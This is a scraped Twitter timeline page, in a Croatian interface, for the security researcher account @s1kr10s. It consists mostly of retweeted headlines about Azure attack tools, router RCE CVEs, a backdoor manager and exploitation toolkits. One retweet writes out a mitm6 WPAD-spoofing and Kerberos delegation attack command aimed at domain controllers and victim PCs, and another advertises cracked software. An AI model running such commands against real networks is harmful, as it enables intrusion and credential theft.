Tweetovi

Blokirali ste korisnika/cu @s1kr10s

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @s1kr10s

  1. 28. sij
    Poništi
  2. proslijedio/la je Tweet
    28. sij

    New blog (and tool): Attacking Azure, Azure AD, and Introducing PowerZure

    Prikaži ovu nit
    Poništi
  3. 22. sij
    Poništi
  4. proslijedio/la je Tweet

    Success! The Research team successfully demonstrated their code execution exploit against the Schneider Electric EcoStruxure Operator Terminal Expert. They're headed to the disclosure room to spill the details.

    Poništi
  5. proslijedio/la je Tweet
    9. sij

    Precise pendulum painting

    Poništi
  6. proslijedio/la je Tweet
    20. sij

    SpaceX boosters landing. Credit Reds Rhetoric/YouTube

    Poništi
  7. 21. sij
    Poništi
  8. proslijedio/la je Tweet
    20. sij

    Me fighting trolls in the ZDNet comments section

    Poništi
  9. proslijedio/la je Tweet
    15. sij

    no dejen morir este vídeo de la traductora de lenguaje de signos en el concierto de Eminem

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    17. sij
    Poništi
  11. proslijedio/la je Tweet
    7. sij

    It's 2020 and you have NetBIOS, LLMNR, SMB sign off but WPAD is still on. EWW! mitm6 -i eth0 -d <domain> -t ldaps://<DomainController> -wh attacker-wpad --delegate-access export KRB5CCNAME=<TGS_ccache_file> –k –no-pass <VictimPC>

    Poništi
  12. proslijedio/la je Tweet
    4. sij

    Just published the awaited blog post on the It was a fun tool and a pesky

    Poništi
  13. proslijedio/la je Tweet
    5. sij

    Simplify3D 4.1.2 Crack Full With License Key [2019] - CrackFinal

    Poništi
  14. proslijedio/la je Tweet
    4. sij
    Poništi
  15. 3. sij

    Tercera parte publicada 😀 sobre la investigación en router D-LINK Dir-859 y Más. CVE Reportados - Remote Code Execution CVE-2019-20217 CVE-2019-20216 CVE-2019-20215 CVE-2019-17621

    Poništi
  16. proslijedio/la je Tweet
    2. sij

    So, it's been a while since I posted on my blog, but I had some spare time over the holidays to do a write up on reversing 's VM1 challenge and writing a custom VM interpreter for it, as well as incorporating YARA into it! Check it out!

    Poništi
  17. proslijedio/la je Tweet
    2. sij
    Poništi
  18. proslijedio/la je Tweet

    Shelly - Simple Backdoor Manager With Python (Based On Weevely)

    Poništi
  19. proslijedio/la je Tweet

    Pown.js - A Security Testing An Exploitation Toolkit Built On Top Of Node.js And NPM

    Poništi
  20. proslijedio/la je Tweet

    Pown.js - A Security Testing An Exploitation Toolkit Built On Top Of Node.js And NPM

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·